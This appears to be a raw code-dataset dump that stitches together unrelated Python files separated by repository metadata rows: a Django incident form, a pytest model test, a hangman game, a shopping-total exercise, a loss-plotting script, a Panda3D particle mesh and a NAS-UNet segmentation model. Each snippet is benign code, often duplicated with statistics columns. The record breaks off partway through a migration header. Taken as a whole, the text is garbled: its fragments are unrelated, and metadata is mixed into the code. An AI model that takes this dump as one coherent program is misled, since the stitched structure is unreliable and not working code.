# from django.forms import ModelChoiceField
from .models import Incident
class IncidentForm(forms.ModelForm):
    """Model form for Incident with cross-field validation of the
    resolution date."""
    class Meta:
        model = Incident
        # Expose every model field on the form.
        fields = "__all__"
    def clean(self):
        # Cross-field check: a resolved ("rs") incident must carry its
        # completion date.
        status_type = self.cleaned_data["status_incident"]
        end_date = self.cleaned_data["finish_date_incidente"]
        # reports = ModelChoiceField(queryset=None, label='reports', required=False)
        if status_type == "rs":
            if not end_date:
                # User-facing message (pt-BR): "provide the incident
                # completion date".
                raise forms.ValidationError(
                    "Informe a data de conclusão do Incidente! "
                )
        # NOTE(review): clean() returns None instead of self.cleaned_data;
        # Django tolerates this, but returning cleaned_data is conventional.
        # if affected.count() == 3:
        #     # print(reports.count(), "<<")
        #     print(reports.to_field_name)
        #     print(dir(reports))
        #     raise forms.ValidationError('Mude o status do incidente para "Em Análise"')
| 643 | 110 | 23 |
439fcd1f7d1571e2b523084ad698125578bf666a | 530 | py | Python | tests/test_models.py | codingjoe/django-mail-auth | 21b102e511bd801f04fbb2328d846e625dac7f60 | [
"MIT"
] | 39 | 2019-04-12T22:44:55.000Z | 2021-12-12T06:03:47.000Z | tests/test_models.py | codingjoe/django-mail-auth | 21b102e511bd801f04fbb2328d846e625dac7f60 | [
"MIT"
] | 49 | 2019-05-28T10:58:51.000Z | 2022-03-29T00:33:18.000Z | tests/test_models.py | codingjoe/django-mail-auth | 21b102e511bd801f04fbb2328d846e625dac7f60 | [
"MIT"
] | 6 | 2019-08-07T06:16:38.000Z | 2022-02-25T12:14:13.000Z | import pytest
from django.db import IntegrityError
from mailauth.contrib.user import models
try:
import psycopg2
except ImportError:
psycopg2 = None
postgres_only = pytest.mark.skipif(
psycopg2 is None, reason="at least mymodule-1.1 required"
)
| 23.043478 | 72 | 0.739623 | import pytest
from django.db import IntegrityError
from mailauth.contrib.user import models
try:
import psycopg2
except ImportError:
psycopg2 = None
postgres_only = pytest.mark.skipif(
psycopg2 is None, reason="at least mymodule-1.1 required"
)
class TestEmailUser:
@postgres_only
def test_email__ci_unique(self, db):
models.EmailUser.objects.create_user("IronMan@avengers.com")
with pytest.raises(IntegrityError):
models.EmailUser.objects.create_user("ironman@avengers.com")
| 201 | 44 | 23 |
906bf78de9d6afaf9d670aa83f0803631f27085d | 2,209 | py | Python | model.py | LucijanZgonik/Vislice | e82614929927438a13df349afedc39a4b19eb290 | [
"MIT"
] | null | null | null | model.py | LucijanZgonik/Vislice | e82614929927438a13df349afedc39a4b19eb290 | [
"MIT"
] | null | null | null | model.py | LucijanZgonik/Vislice | e82614929927438a13df349afedc39a4b19eb290 | [
"MIT"
] | null | null | null | STEVILO_DOVOLJENIH_NAPAK = 10
PRAVILNA_CRKA = '+'
NAPACNA_CRKA = '-'
PONOVLJENA_CRKA = 'o'
ZMAGA = 'W'
PORAZ = 'L'
bazen_besed = []
with open ("Vislice/besede.txt") as datoteka_bazena:
for beseda in datoteka_bazena:
bazen_besed.append(beseda.strip().lower())
import random
| 21.240385 | 63 | 0.466274 | STEVILO_DOVOLJENIH_NAPAK = 10
PRAVILNA_CRKA = '+'
NAPACNA_CRKA = '-'
PONOVLJENA_CRKA = 'o'
ZMAGA = 'W'
PORAZ = 'L'
class Igra:
    """State of one hangman game: the secret word (``geslo``) and the
    letters guessed so far (``crke``), all handled lower-case."""
    def __init__(self, geslo, crke=None):
        """Start a game for *geslo*; *crke* optionally seeds prior guesses."""
        self.geslo = geslo
        if crke is None:
            self.crke = []
        else:
            self.crke = [c.lower() for c in crke]
    def napacne_crke(self):
        """Guessed letters absent from the word, in guess order."""
        return ''.join(x for x in self.crke if x not in self.geslo)
    def pravilne_crke(self):
        """Guessed letters present in the word, in guess order."""
        return ''.join(x for x in self.crke if x in self.geslo)
    def stevilo_napak(self):
        """Number of wrong guesses so far."""
        return len(self.napacne_crke())
    def zmaga(self):
        """True when every letter of the word has been guessed.

        Bug fix: the original returned inside the loop's else branch,
        so it inspected only the first letter of the word and declared
        victory as soon as that single letter was guessed.
        """
        return all(c in self.crke for c in self.geslo)
    def poraz(self):
        """True once the wrong-guess budget is exhausted."""
        return self.stevilo_napak() > STEVILO_DOVOLJENIH_NAPAK
    def pravilni_del_gesla(self):
        """The word with unguessed letters masked by underscores."""
        return ''.join(x if x in self.crke else '_' for x in self.geslo)
    def nepravilni_ugibi(self):
        """Wrong guesses as a space-separated display string."""
        return " ".join(self.napacne_crke())
    def ugibaj(self, crka):
        """Process one guess; returns one of the module outcome codes
        (PONOVLJENA_CRKA, PRAVILNA_CRKA, NAPACNA_CRKA, ZMAGA, PORAZ)."""
        crka = crka.lower()
        if crka in self.crke:
            return PONOVLJENA_CRKA
        self.crke.append(crka)
        if crka in self.geslo:
            return ZMAGA if self.zmaga() else PRAVILNA_CRKA
        else:
            return PORAZ if self.poraz() else NAPACNA_CRKA
# Word pool loaded once at import time, one lower-cased word per line.
# NOTE(review): the path is relative to the working directory, so
# importing this module from elsewhere will fail to find the file.
bazen_besed = []
with open ("Vislice/besede.txt") as datoteka_bazena:
    for beseda in datoteka_bazena:
        bazen_besed.append(beseda.strip().lower())
import random
def nova_igra():
    # Start a fresh game with a random word from the pool.
    nakljucna_beseda = random.choice(bazen_besed)
    return Igra(nakljucna_beseda)
| 1,508 | -10 | 333 |
172ceb42551e8d4b82c6d6256ce9ad79098808ef | 830 | py | Python | Python/ex39.py | Anderson0312/Python | 1fd225378c55309640d584a4894393f7c40dc9ed | [
"MIT"
] | 1 | 2022-02-01T17:59:50.000Z | 2022-02-01T17:59:50.000Z | Python/ex39.py | Anderson0312/Python | 1fd225378c55309640d584a4894393f7c40dc9ed | [
"MIT"
] | null | null | null | Python/ex39.py | Anderson0312/Python | 1fd225378c55309640d584a4894393f7c40dc9ed | [
"MIT"
] | null | null | null | print('-=' * 15)
print('{:^30}'.format('LOJA SUPER BARATÃO'))
print('-=' * 15)
total = cont1000 = menor = cont = 0
nomemenor = ''
while True:
nomeP = str(input('Nome do produto: '))
preco = float(input('Preço: R$ '))
cont += 1
soun = ' '
print('-' * 30)
while soun not in 'SN':
soun = str(input('Quer Continuar? [S/N]')).strip()[0].upper()
print('-' * 30)
total += preco
if preco >= 1000:
cont1000 += 1
if cont == 1:
menor = preco
nomemenor = nomeP
else:
if preco < menor:
menor = preco
nomemenor = nomeP
if soun == 'N':
break
print(f'O total de compra foi R${total:.2f}')
print(f'Temos {cont1000} produtos custando mais de R$ 1000.00')
print(f'O produto mais barato foi {nomemenor} que custa {menor:.2f}') | 28.62069 | 69 | 0.543373 | print('-=' * 15)
# Till/receipt exercise: read product name and price pairs until the user
# answers 'N', then print the total, the count of items >= R$1000 and the
# cheapest product seen.
print('{:^30}'.format('LOJA SUPER BARATÃO'))
print('-=' * 15)
total = cont1000 = menor = cont = 0
nomemenor = ''
while True:
    nomeP = str(input('Nome do produto: '))
    preco = float(input('Preço: R$ '))
    cont += 1
    soun = ' '
    print('-' * 30)
    # Re-ask until the first character of the reply is S or N.
    # NOTE(review): an empty reply makes [0] raise IndexError.
    while soun not in 'SN':
        soun = str(input('Quer Continuar? [S/N]')).strip()[0].upper()
    print('-' * 30)
    total += preco
    if preco >= 1000:
        cont1000 += 1
    # Track the cheapest product so far (the first item seeds the minimum).
    if cont == 1:
        menor = preco
        nomemenor = nomeP
    else:
        if preco < menor:
            menor = preco
            nomemenor = nomeP
    if soun == 'N':
        break
print(f'O total de compra foi R${total:.2f}')
print(f'Temos {cont1000} produtos custando mais de R$ 1000.00')
print(f'O produto mais barato foi {nomemenor} que custa {menor:.2f}') | 0 | 0 | 0 |
7da5f84d5906da12c0ab908da3370cab26295fcb | 3,525 | py | Python | scratch/regression/rolling_validation/plot_losses.py | finn-dodgson/DeepHalos | 86e0ac6c24ac97a0a2a0a60a7ea3721a04bd050c | [
"MIT"
] | 2 | 2021-07-26T10:56:33.000Z | 2021-12-20T17:30:53.000Z | scratch/regression/rolling_validation/plot_losses.py | finn-dodgson/DeepHalos | 86e0ac6c24ac97a0a2a0a60a7ea3721a04bd050c | [
"MIT"
] | 1 | 2021-11-25T21:01:19.000Z | 2021-12-05T01:40:53.000Z | scratch/regression/rolling_validation/plot_losses.py | finn-dodgson/DeepHalos | 86e0ac6c24ac97a0a2a0a60a7ea3721a04bd050c | [
"MIT"
] | 1 | 2021-11-27T02:35:10.000Z | 2021-11-27T02:35:10.000Z | import numpy as np
import matplotlib.pyplot as plt
# One run directory per dropout setting, plus a run trained without sim 3.
paths = '/Users/lls/Documents/deep_halos_files/regression/rolling_val/'
paths_all = [paths + '0dropout/', paths + '0.1dropout/', paths + '0.2dropout/', paths + '0.3dropout/',
             paths + 'no_sim3/']
dropout_pc = ["0", "10", "20", "30", "40"]
# 3x2 grid of panels, flattened for 1-D indexing; panel 5 holds the legend.
f, axes = plt.subplots(3, 2, sharex=True, figsize=(10, 7))
axes = np.concatenate(axes)
# Skip the first n rows of the training log when plotting.
n = 5
# First pass: solid curves for each run's losses over all particles;
# panel 5 (the last axis) is reserved for a shared legend.
for i in range(6):
    ax = axes[i]
    if i == 5:
        ax.plot([], [], label="training", color="C0")
        ax.plot([], [], label="validation", color="C1")
        ax.plot([], [], label="training (end of epoch + no dropout)",
                color="k")
        ax.plot([], [], color="C2",
                label="sim-7 (not used during training)")
        ax.plot([], [], label="all particles", color="dimgrey", ls="-", lw=2)
        ax.plot([], [], label="particles with $\log(M) \leq 13.5$", color="dimgrey", ls="--", lw=2)
        ax.legend(loc="center", fontsize=14)
        ax.axis('off')
    else:
        if i == 0:
            ax.set_yscale("log")
        else:
            ax.set_ylim(0.01, 0.58)
        path = paths_all[i]
        # Per-step Keras CSV log and per-epoch numpy loss records.
        tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
        loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
        ax.plot(tr[n:, 0], tr[n:, 1], label="training", color="C0")
        ax.plot(tr[n:, 0], tr[n:, 2], label="validation", color="C1")
        ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 1], label="training (end of epoch + no dropout)",
                color="k")
        ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,1], color="k", s=5)
        ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 2], color="C2",
                label="sim-7 (not used during training)")
        ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,2], color="C2", s=5)
        if i == 2:
            ax.set_ylabel("Loss")
        if i == 4:
            ax.set_xlabel("Epoch")
        if i in [2, 3, 4]:
            ax.text(0.7, 0.9, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
        else:
            ax.text(0.7, 0.7, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
# Second pass: overlay (dashed) the same losses restricted to particles
# with log(M) <= 13.5.
# NOTE(review): `tr` is re-loaded below but never used in this loop, and
# the .npy file name contains "validaton" (sic) -- kept as-is since it
# must match the file on disk.
for i in range(6):
    ax = axes[i]
    if i == 5:
        pass
    else:
        if i == 0:
            ax.set_yscale("log")
        elif i in [3, 4]:
            ax.set_ylim(0.12, 0.5)
        else:
            ax.set_ylim(0.01, 0.58)
        path = paths_all[i]
        tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
        # loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
        loss_training_sim7_above_135 = np.load(path + "loss_training_sim7_validaton_above_135Msol.npy")
        ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 3], label="validation", color="C1", ls="--")
        ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 1], label="training (end of epoch + no dropout)",
                color="k", ls="--")
        ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,1], color="k", s=5)
        ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 2], color="C2",
                label="sim-7 (not used during training)", ls="--")
        ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,2], color="C2", s=5)
plt.subplots_adjust(wspace=0.15, hspace=0.05)
# NOTE(review): `paths + ''` is just the directory; savefig needs a file
# name (e.g. paths + 'losses.png') -- as written this call cannot produce
# the intended figure file.
plt.savefig(paths + '')
| 40.517241 | 133 | 0.571348 | import numpy as np
# Panel figure comparing training / validation / sim-7 loss curves for CNN
# runs at 0/10/20/30/40% dropout (panels 0-4); panel 5 holds only the legend.
# NOTE(review): `np` must already be imported when this section runs, and
# `plt.savefig(paths + '')` targets the bare directory path with an empty
# file name -- the intended output file name appears to be missing; confirm.
import matplotlib.pyplot as plt
paths = '/Users/lls/Documents/deep_halos_files/regression/rolling_val/'
paths_all = [paths + '0dropout/', paths + '0.1dropout/', paths + '0.2dropout/', paths + '0.3dropout/',
             paths + 'no_sim3/']
dropout_pc = ["0", "10", "20", "30", "40"]
f, axes = plt.subplots(3, 2, sharex=True, figsize=(10, 7))
axes = np.concatenate(axes)
# Skip the first n epochs of training.log when plotting (burn-in).
n = 5
# First pass: solid lines -- losses computed on all particles.
for i in range(6):
    ax = axes[i]
    if i == 5:
        # Legend-only panel: empty plots just register the legend entries.
        ax.plot([], [], label="training", color="C0")
        ax.plot([], [], label="validation", color="C1")
        ax.plot([], [], label="training (end of epoch + no dropout)",
                color="k")
        ax.plot([], [], color="C2",
                label="sim-7 (not used during training)")
        ax.plot([], [], label="all particles", color="dimgrey", ls="-", lw=2)
        ax.plot([], [], label="particles with $\log(M) \leq 13.5$", color="dimgrey", ls="--", lw=2)
        ax.legend(loc="center", fontsize=14)
        ax.axis('off')
    else:
        if i == 0:
            ax.set_yscale("log")
        else:
            ax.set_ylim(0.01, 0.58)
        path = paths_all[i]
        # training.log columns: epoch, training loss, validation loss.
        tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
        loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
        ax.plot(tr[n:, 0], tr[n:, 1], label="training", color="C0")
        ax.plot(tr[n:, 0], tr[n:, 2], label="validation", color="C1")
        ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 1], label="training (end of epoch + no dropout)",
                color="k")
        ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,1], color="k", s=5)
        ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 2], color="C2",
                label="sim-7 (not used during training)")
        ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,2], color="C2", s=5)
        if i == 2:
            ax.set_ylabel("Loss")
        if i == 4:
            ax.set_xlabel("Epoch")
        if i in [2, 3, 4]:
            ax.text(0.7, 0.9, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
        else:
            ax.text(0.7, 0.7, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
# Second pass: dashed lines -- same panels, losses restricted to the
# high-mass subset (file name suggests validation above 10^13.5 Msol).
for i in range(6):
    ax = axes[i]
    if i == 5:
        pass
    else:
        if i == 0:
            ax.set_yscale("log")
        elif i in [3, 4]:
            ax.set_ylim(0.12, 0.5)
        else:
            ax.set_ylim(0.01, 0.58)
        path = paths_all[i]
        tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
        # loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
        loss_training_sim7_above_135 = np.load(path + "loss_training_sim7_validaton_above_135Msol.npy")
        ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 3], label="validation", color="C1", ls="--")
        ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 1], label="training (end of epoch + no dropout)",
                color="k", ls="--")
        ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,1], color="k", s=5)
        ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 2], color="C2",
                label="sim-7 (not used during training)", ls="--")
        ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,2], color="C2", s=5)
plt.subplots_adjust(wspace=0.15, hspace=0.05)
plt.savefig(paths + '')
| 0 | 0 | 0 |
48fdf11a4bd8b2ba7b22bc93b7ceb1470082f2cd | 5,618 | py | Python | ParticleField.py | l3alr0g/Hull-breach-analysis | 5128f6feeeb6b85bcc469e452ce904736e857839 | [
"MIT"
] | 3 | 2020-01-09T19:40:05.000Z | 2021-04-24T06:47:27.000Z | ParticleField.py | l3alr0g/Hull-breach-tracking | 7ce34488ec95f93f0afb571731757a1ce569673e | [
"MIT"
] | null | null | null | ParticleField.py | l3alr0g/Hull-breach-tracking | 7ce34488ec95f93f0afb571731757a1ce569673e | [
"MIT"
] | null | null | null | from panda3d.core import * # needs to be improved later on (maybe)
from ProceduralGen import *
from copy import deepcopy
from physX import engine, PhysXNode, LinArrayFormat, ArrayLinFormat
from NodeStates import State
| 48.017094 | 166 | 0.55429 | from panda3d.core import * # needs to be improved later on (maybe)
from ProceduralGen import *
from copy import deepcopy
from physX import engine, PhysXNode, LinArrayFormat, ArrayLinFormat
from NodeStates import State
class ParticleMesh:
    """A rectangular array of physics nodes that reacts to mechanical stresses.

    The mesh couples a procedural ``RectangleSurface`` with one ``PhysXNode``
    per vertex.  Each :meth:`update` call applies the user-supplied rule
    tasks to the nodes, advances the physics engine by one step and deforms
    the underlying surface so it follows the new node positions.
    """

    def __init__(self, l, w, Vl, Vw, extraArgs):
        """Create the mesh.

        :param l: length of the surface in 3D units.
        :param w: width of the surface in 3D units.
        :param Vl: number of vertices along the length (int).
        :param Vw: number of vertices along the width (int).
        :param extraArgs: currently unused; kept for interface compatibility.
        """
        # core variables
        self.size = (Vl, Vw)
        self.surface = RectangleSurface(l, w, Vl, Vw)
        PosState = LinArrayFormat(self.surface.GetPosData(), (Vl, Vw))
        # One physics node per vertex; every node starts with the "free" rule.
        # (Original author's note, translated from French: careful, a (j, i)
        # index mix-up is possible here.)
        self.Nodes = [[PhysXNode(j, i, PosState[j][i], 1, "free")
                       for i in range(Vw)] for j in range(Vl)]
        # use the provided physics engine (see physX file)
        self.engine = engine()

    def update(self, dt, physXtasks, frame, memory):
        """Advance the simulation by one frame.

        :param dt: simulation time step.
        :param physXtasks: user tasks; ``task[0]`` encodes
            ``"<target>_<rule>[_<func>]"`` and the remaining entries carry
            target indices, rule parameters and frame ranges.
        :param frame: current frame number.
        :param memory: history object exposing ``getFramePosData``.
        :returns: ``(mesh, positions)`` -- a deep copy of the deformed
            GeomNode and the per-node position grid.
        """
        Vl, Vw = self.size
        # Apply the user-defined rules to the targeted nodes.
        for task in physXtasks:  # scan the user data
            chosen_rule = task[0].strip().split("_")
            target_kind, rule = chosen_rule[0], chosen_rule[1]
            # BUGFIX: the original condition was
            # ``task[3][0] <= frame <= task[3][0]``, which only ever matched
            # the first frame of the range; the upper bound must be the end
            # frame ``task[3][1]`` (cf. the Fstart/Fend unpacking below).
            if rule == "static" and task[3][0] <= frame <= task[3][1]:
                Fstart, Fend = task[3]
                PosData = memory.getFramePosData(Fstart)
                if target_kind == 'line':  # one override per vertex of the line
                    currentCenter = Vec3(0, 0, 0)  # accumulate the line's center
                    for i in range(Vw):
                        currentCenter += PosData[task[1] - 1][i]
                    med = currentCenter / Vw
                    coord = troubleShoot_NoneTypes(task[2], med)
                    displacement = coord - med  # displacement of the line center
                    for i in range(Vw):
                        self.Nodes[task[1] - 1][i].state.setRule(
                            'static', coord=PosData[task[1] - 1][i] + displacement)
                elif target_kind == 'column':
                    currentCenter = Vec3(0, 0, 0)  # accumulate the column's center
                    for i in range(Vl):
                        currentCenter += PosData[i][task[1] - 1]
                    med = currentCenter / Vl
                    coord = troubleShoot_NoneTypes(task[2], med)
                    displacement = coord - med  # displacement of the column center
                    for i in range(Vl):
                        self.Nodes[i][task[1] - 1].state.setRule(
                            'static', coord=PosData[i][task[1] - 1] + displacement)
                elif target_kind == 'single':
                    coord = troubleShoot_NoneTypes(
                        task[2], PosData[task[1][0] - 1][task[1][1] - 1])
                    self.Nodes[task[1][0] - 1][task[1][1] - 1].state.setRule(
                        'static', coord=coord)
            elif rule == "following":
                func = chosen_rule[2]
                begin, end = task[3][0], task[3][1]
                settings = [x for x in task[2][:3]] + [Vec3(task[2][3])]
                if begin <= frame <= end:
                    self.Nodes[task[1][0] - 1][task[1][1] - 1].state.setRule(
                        rule, followingFunc=func, FuncSettings=settings)
                else:
                    self.Nodes[task[1][0] - 1][task[1][1] - 1].state.setRule("free")
            elif rule == "virtual":
                begin, end = task[2][0], task[2][1]
                if begin <= frame <= end:
                    self.Nodes[task[1][0] - 1][task[1][1] - 1].state.setRule(rule)
                else:
                    self.Nodes[task[1][0] - 1][task[1][1] - 1].state.setRule("free")
        # Let the engine integrate one step, then push the results back into
        # the nodes.
        NodeOutput = self.engine.bake(self.Nodes, dt, frame)
        for i in range(Vl):
            for j in range(Vw):
                self.Nodes[i][j].update(NodeOutput[i][j], frame)
        # Deform the mesh (this also recomputes the normals) from the baked
        # positions.
        self.surface.deform(ArrayLinFormat(
            [[NodeOutput[i][j].pos for i in range(Vl)] for j in range(Vw)]))
        mesh = deepcopy(self.surface.GeomNode)  # copy after it has been modified
        return mesh, [[self.Nodes[i][j].pos for i in range(Vl)] for j in range(Vw)]

    def override(self, coord, *args):
        # Placeholder -- overriding a coordinate directly is not implemented.
        return None
def troubleShoot_NoneTypes(Vec, replaceVec):
    """Replace ``None`` components of *Vec* with the matching components of
    *replaceVec* and return the result as a :class:`Vec3`.

    NOTE(review): the replacement happens in place on *Vec* itself
    (``output`` is an alias, not a copy), so the caller's sequence is
    mutated; preserved here because ParticleMesh.update passes task
    parameters that may rely on being patched.
    """
    output = Vec
    for i, component in enumerate(Vec):
        # ``is None`` instead of the original ``== None``: identity is the
        # correct test, since vector component types may overload ``==``.
        if component is None:
            output[i] = replaceVec[i]
    return Vec3(output)
return Vec3(output) | 3,862 | 1,488 | 46 |
6e18fe03136a564e0edc71a067b8e64cc5d7d36e | 5,899 | py | Python | NasUnet/models/nas_unet.py | mlvc-lab/Segmentation-NAS | a9387a1546dacfa2dc6ee1f70366542a1552e541 | [
"MIT"
] | 4 | 2020-03-26T11:05:08.000Z | 2020-12-22T08:37:20.000Z | NasUnet/models/nas_unet.py | mlvc-lab/Segmentation-NAS | a9387a1546dacfa2dc6ee1f70366542a1552e541 | [
"MIT"
] | null | null | null | NasUnet/models/nas_unet.py | mlvc-lab/Segmentation-NAS | a9387a1546dacfa2dc6ee1f70366542a1552e541 | [
"MIT"
] | 3 | 2020-03-26T11:05:09.000Z | 2022-01-28T11:29:00.000Z | from util.prim_ops_set import *
from .fcn import FCNHead
from .base import BaseNet
from util.functional import *
from torch.nn.functional import interpolate
class BuildCell(nn.Module):
"""Build a cell from genotype"""
class NasUnet(BaseNet):
"""Construct a network"""
| 37.814103 | 118 | 0.579081 | from util.prim_ops_set import *
from .fcn import FCNHead
from .base import BaseNet
from util.functional import *
from torch.nn.functional import interpolate
class BuildCell(nn.Module):
    """Build a cell from a searched genotype.

    The cell preprocesses its two inputs (``s0`` from two layers back,
    ``s1`` from the previous layer) to a common channel count ``c``, then
    applies the genotype's (op, input-index) pairs and concatenates the
    selected intermediate states along the channel dimension.
    """
    def __init__(self, genotype, c_prev_prev, c_prev, c, cell_type, dropout_prob=0):
        """
        :param genotype: searched architecture with ``up``/``down`` op lists
            and the matching ``up_concat``/``down_concat`` index lists.
        :param c_prev_prev: channels of input ``s0``.
        :param c_prev: channels of input ``s1``.
        :param c: internal channel count of the cell.
        :param cell_type: ``'down'`` (encoder) or ``'up'`` (decoder).
        :param dropout_prob: dropout probability forwarded to every op.
        """
        super(BuildCell, self).__init__()
        if cell_type == 'down':
            # Note: the s0 size is twice than s1!
            self.preprocess0 = ConvOps(c_prev_prev, c, kernel_size=1, stride=2, ops_order='act_weight_norm')
        else:
            self.preprocess0 = ConvOps(c_prev_prev, c, kernel_size=1, ops_order='act_weight_norm')
        self.preprocess1 = ConvOps(c_prev, c, kernel_size=1, ops_order='act_weight_norm')
        # Pick the op list that matches the cell direction.
        if cell_type == 'up':
            op_names, idx = zip(*genotype.up)
            concat = genotype.up_concat
        else:
            op_names, idx = zip(*genotype.down)
            concat = genotype.down_concat
        self.dropout_prob = dropout_prob
        self._compile(c, op_names, idx, concat)
    def _compile(self, c, op_names, idx, concat):
        """Materialize the genotype's named ops into ``self._ops``."""
        assert len(op_names) == len(idx)
        # Every meta node consumes exactly two (op, input-index) pairs.
        self._num_meta_node = len(op_names) // 2
        self._concat = concat
        self._multiplier = len(concat)
        self._ops = nn.ModuleList()
        for name, index in zip(op_names, idx):
            op = OPS[name](c, None, affine=True, dp=self.dropout_prob)
            self._ops += [op]
        self._indices = idx
    def forward(self, s0, s1):
        """Run the cell; returns the channel-wise concat of the states listed
        in ``self._concat``.  Inputs are assumed NCHW (see size unpacking)."""
        s0 = self.preprocess0(s0)
        s1 = self.preprocess1(s1)
        states = [s0, s1]
        for i in range(self._num_meta_node):
            h1 = states[self._indices[2*i]]
            h2 = states[self._indices[2*i+1]]
            op1 = self._ops[2*i]
            op2 = self._ops[2*i+1]
            h1 = op1(h1)
            h2 = op2(h2)
            # the size of h1 and h2 may be different, so we need interpolate
            if h1.size() != h2.size() :
                _, _, height1, width1 = h1.size()
                _, _, height2, width2 = h2.size()
                # Resample the smaller feature map to the larger spatial size.
                if height1 > height2 or width1 > width2:
                    h2 = interpolate(h2, (height1, width1))
                else:
                    h1 = interpolate(h1, (height2, width2))
            s = h1+h2
            states += [s]
        return torch.cat([states[i] for i in self._concat], dim=1)
class NasUnet(BaseNet):
    """Construct a NAS-UNet network.

    Two stem convolutions feed a stack of searched encoder cells; the
    decoder cells consume the matching encoder outputs as U-Net style
    horizontal skip inputs, and a 1x1 head produces the class logits.
    """
    def __init__(self, nclass, in_channels, backbone=None, aux=False,
                 c=48, depth=5, dropout_prob=0,
                 genotype=None, double_down_channel=False):
        """
        :param nclass: number of output classes.
        :param in_channels: number of input image channels.
        :param backbone: forwarded to :class:`BaseNet`.
        :param aux: add an auxiliary FCN head on the last decoder output.
        :param c: base channel count of the cells.
        :param depth: number of encoder cells (must be >= 2).
        :param dropout_prob: dropout probability inside each cell.
        :param genotype: searched cell architecture.
        :param double_down_channel: double (encoder) / halve (decoder) the
            cell channel count at every stage.
        """
        super(NasUnet, self).__init__(nclass, aux, backbone, norm_layer=nn.GroupNorm)
        self._depth = depth
        self._double_down_channel = double_down_channel
        stem_multiplier = 4
        c_curr = stem_multiplier * c
        c_prev_prev, c_prev, c_curr = c_curr, c_curr, c
        # the stem need a complicate mode
        self.stem0 = ConvOps(in_channels, c_prev_prev, kernel_size=1, ops_order='weight_norm')
        self.stem1 = ConvOps(in_channels, c_prev, kernel_size=3, stride=2, ops_order='weight_norm')
        assert depth >= 2 , 'depth must >= 2'
        self.down_cells = nn.ModuleList()
        self.up_cells = nn.ModuleList()
        # Channel counts of every encoder output, indexed for the decoder's
        # horizontal skip connections.
        down_cs_nfilters = []
        # create the encoder pathway and add to a list
        down_cs_nfilters += [c_prev]
        down_cs_nfilters += [c_prev_prev]
        for i in range(depth):
            c_curr = 2 * c_curr if self._double_down_channel else c_curr  # double the number of filters
            down_cell = BuildCell(genotype, c_prev_prev, c_prev, c_curr, cell_type='down', dropout_prob=dropout_prob)
            self.down_cells += [down_cell]
            c_prev_prev, c_prev = c_prev, down_cell._multiplier*c_curr
            down_cs_nfilters += [c_prev]
        # create the decoder pathway and add to a list
        for i in range(depth+1):
            c_prev_prev = down_cs_nfilters[-(i + 2)] # the horizontal prev_prev input channel
            up_cell = BuildCell(genotype, c_prev_prev, c_prev, c_curr, cell_type='up', dropout_prob=dropout_prob)
            self.up_cells += [up_cell]
            c_prev = up_cell._multiplier*c_curr
            c_curr = c_curr // 2 if self._double_down_channel else c_curr # halve the number of filters
        self.nas_unet_head = ConvOps(c_prev, nclass, kernel_size=1, ops_order='weight')
        if self.aux:
            self.auxlayer = FCNHead(c_prev, nclass, nn.BatchNorm2d)
    def forward(self, x):
        """Return ``[logits]`` (plus ``[aux logits]`` when ``aux`` is on)."""
        _, _, h, w = x.size()
        s0, s1 = self.stem0(x), self.stem1(x)
        down_cs = []
        # encoder pathway: remember every intermediate output for the skips
        down_cs.append(s0)
        down_cs.append(s1)
        for i, cell in enumerate(self.down_cells):
            # Sharing a global N*M weights matrix
            # where M : normal + down
            s0, s1 = s1, cell(s0, s1)
            down_cs.append(s1)
        # decoder pathway
        for i, cell in enumerate(self.up_cells):
            # Sharing a global N*M weights matrix
            # where M : normal + up
            s0 = down_cs[-(i+2)] # horizon input
            s1 = cell(s0, s1)
        output = self.nas_unet_head(s1)
        outputs = []
        outputs.append(output)
        if self.aux: # use aux header
            auxout = self.auxlayer(s1)
            auxout = interpolate(auxout, (h,w), **self._up_kwargs)
            outputs.append(auxout)
        return outputs
def get_nas_unet(dataset='pascal_voc', **kwargs):
    """Build a :class:`NasUnet` sized for *dataset*'s classes and channels."""
    from util.datasets import datasets
    # Look the dataset record up once instead of twice.
    dataset_info = datasets[dataset.lower()]
    return NasUnet(dataset_info.NUM_CLASS, dataset_info.IN_CHANNELS, **kwargs)
| 5,438 | 0 | 170 |
1ef0fee033bf0679a68c77bee0f826dfd87bc8a2 | 1,348 | py | Python | metecho/api/migrations/0103_alter_task_status.py | RupertBarrow/Metecho | 322f7fab7e18063c38ee2e803b7a68212d87fe2c | [
"BSD-3-Clause"
] | 21 | 2020-04-02T21:39:58.000Z | 2022-01-31T19:43:47.000Z | metecho/api/migrations/0103_alter_task_status.py | RupertBarrow/Metecho | 322f7fab7e18063c38ee2e803b7a68212d87fe2c | [
"BSD-3-Clause"
